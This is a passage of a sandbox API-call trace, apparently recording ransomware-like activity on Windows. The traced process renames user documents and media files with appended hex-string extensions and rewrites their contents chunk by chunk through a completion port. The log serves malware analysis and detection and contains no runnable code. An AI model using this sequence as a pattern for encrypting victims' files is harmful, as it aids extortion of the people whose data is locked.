lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4.7030B58C51D8E565BAC50B0E562EFEE4B3340FF153D922BA62DDB6F8C12CC170") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4.7030B58C51D8E565BAC50B0E562EFEE4B3340FF153D922BA62DDB6F8C12CC170" [0123.397] GetProcessHeap () returned 0x600000 [0123.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x3117220 [0123.397] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x3117220, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0123.399] CloseHandle (hObject=0x32c) returned 1 [0123.399] GetProcessHeap () returned 0x600000 [0123.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.399] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.400] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0123.401] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc", lpString2=".E4B0E1CAE8C35462DE7C7E2A7CD4DE14B2BDEE256401843AB93A5A5E68259612" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc.E4B0E1CAE8C35462DE7C7E2A7CD4DE14B2BDEE256401843AB93A5A5E68259612") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc.E4B0E1CAE8C35462DE7C7E2A7CD4DE14B2BDEE256401843AB93A5A5E68259612" [0123.401] GetProcessHeap () returned 0x600000 [0123.401] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13a) returned 0x3117358 [0123.401] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x3117358, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0123.403] CloseHandle (hObject=0x308) returned 1 [0123.403] GetProcessHeap () returned 0x600000 [0123.403] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0123.406] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.412] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.412] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.413] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0123.414] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi", lpString2=".5F7EB44A3CF2FC1488876E1608A1017F64F409D92E9F3E26AF16EC5940294A19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi.5F7EB44A3CF2FC1488876E1608A1017F64F409D92E9F3E26AF16EC5940294A19") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi.5F7EB44A3CF2FC1488876E1608A1017F64F409D92E9F3E26AF16EC5940294A19" [0123.414] GetProcessHeap () returned 0x600000 [0123.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x31174a0 [0123.414] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x31174a0, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0123.416] CloseHandle (hObject=0x308) returned 1 [0123.416] GetProcessHeap () returned 0x600000 [0123.416] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.416] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.420] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.420] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.421] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0123.422] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt", lpString2=".17A27674962732E6827BDBA6CFCB376E281A1C8BC1BAEA1F0816325239436700" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt.17A27674962732E6827BDBA6CFCB376E281A1C8BC1BAEA1F0816325239436700") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt.17A27674962732E6827BDBA6CFCB376E281A1C8BC1BAEA1F0816325239436700" [0123.422] GetProcessHeap () returned 0x600000 [0123.422] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x31175c8 [0123.422] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x31175c8, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0123.423] CloseHandle (hObject=0x308) returned 1 [0123.424] GetProcessHeap () returned 0x600000 [0123.424] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.424] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.428] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.428] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.429] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.429] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.436] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.437] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.443] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.443] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.453] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.453] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.461] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.462] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.474] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.475] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.483] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.483] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.491] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.492] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.499] WriteFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0123.500] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.506] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.507] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.518] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.518] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.578] ReadFile (in: hFile=0x308, lpBuffer=0x690478, nNumberOfBytesToRead=0x3c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.581] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.596] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0123.596] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx", lpString2=".3D7E411D9589E30C086BB69947C0D84FF34FD7896BE24E69E747D814A9B91048" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx.3D7E411D9589E30C086BB69947C0D84FF34FD7896BE24E69E747D814A9B91048") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx.3D7E411D9589E30C086BB69947C0D84FF34FD7896BE24E69E747D814A9B91048" [0123.596] GetProcessHeap () returned 0x600000 [0123.596] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x6f5f18 [0123.597] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x2b3ff60, FileInformation=0x6f5f18, Length=0x126, FileInformationClass=0xa) returned 0x0 [0123.598] CloseHandle (hObject=0x324) returned 1 [0123.598] GetProcessHeap () returned 0x600000 [0123.598] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0123.600] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.604] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x2b3ff70) returned 0x0 [0123.605] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3", lpString2=".AA877F2F6C118CB3ACE8611F4D1BB333AA6FF2B85D8C0B79881BE2F54B32765E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3.AA877F2F6C118CB3ACE8611F4D1BB333AA6FF2B85D8C0B79881BE2F54B32765E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3.AA877F2F6C118CB3ACE8611F4D1BB333AA6FF2B85D8C0B79881BE2F54B32765E" [0123.605] GetProcessHeap () returned 0x600000 [0123.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x6f63f8 [0123.605] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x6f63f8, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0123.606] CloseHandle (hObject=0x320) returned 1 [0123.607] GetProcessHeap () returned 0x600000 [0123.607] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0123.608] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.615] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.615] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.616] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.617] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3", lpString2=".CAC72E890F191EAB3428EB4B74023236B780D15EED334C37E98054EB6828596A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3.CAC72E890F191EAB3428EB4B74023236B780D15EED334C37E98054EB6828596A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3.CAC72E890F191EAB3428EB4B74023236B780D15EED334C37E98054EB6828596A" [0123.617] GetProcessHeap () returned 0x600000 [0123.617] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x114) returned 0x33683d8 [0123.617] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x33683d8, Length=0x114, FileInformationClass=0xa) returned 0x0 [0123.618] CloseHandle (hObject=0x320) returned 1 [0123.619] GetProcessHeap () returned 0x600000 [0123.619] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.619] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.622] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.623] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.624] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.624] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3", lpString2=".C95BB2D408BD4E1FC72FFBCC6066253FE1B694318C8769A12E0C93AE64974201" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3.C95BB2D408BD4E1FC72FFBCC6066253FE1B694318C8769A12E0C93AE64974201") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3.C95BB2D408BD4E1FC72FFBCC6066253FE1B694318C8769A12E0C93AE64974201" [0123.624] GetProcessHeap () returned 0x600000 [0123.624] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x3368188 [0123.624] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x3368188, Length=0x116, FileInformationClass=0xa) returned 0x0 [0123.626] CloseHandle (hObject=0x320) returned 1 [0123.626] GetProcessHeap () returned 0x600000 [0123.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.626] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.629] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.630] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.630] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.631] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv", lpString2=".812DE47CC5792AA9941B4F9613E086F0C4BBA5455277BC49C38A896F06AB655B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv.812DE47CC5792AA9941B4F9613E086F0C4BBA5455277BC49C38A896F06AB655B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv.812DE47CC5792AA9941B4F9613E086F0C4BBA5455277BC49C38A896F06AB655B" [0123.631] GetProcessHeap () returned 0x600000 [0123.631] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x6f1b18 [0123.631] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x6f1b18, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0123.632] CloseHandle (hObject=0x320) returned 1 [0123.633] GetProcessHeap () returned 0x600000 [0123.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.633] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.636] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.636] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.637] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.638] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav", lpString2=".D15CD9EAF2BBFA85BF09761478C4142332B1CCF4E32BE37B69EC075E68AC7E76" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav.D15CD9EAF2BBFA85BF09761478C4142332B1CCF4E32BE37B69EC075E68AC7E76") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav.D15CD9EAF2BBFA85BF09761478C4142332B1CCF4E32BE37B69EC075E68AC7E76" [0123.638] GetProcessHeap () returned 0x600000 [0123.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x118) returned 0x3368500 [0123.638] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x3368500, Length=0x118, FileInformationClass=0xa) returned 0x0 [0123.639] CloseHandle (hObject=0x320) returned 1 [0123.639] GetProcessHeap () returned 0x600000 [0123.639] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.639] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.643] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, 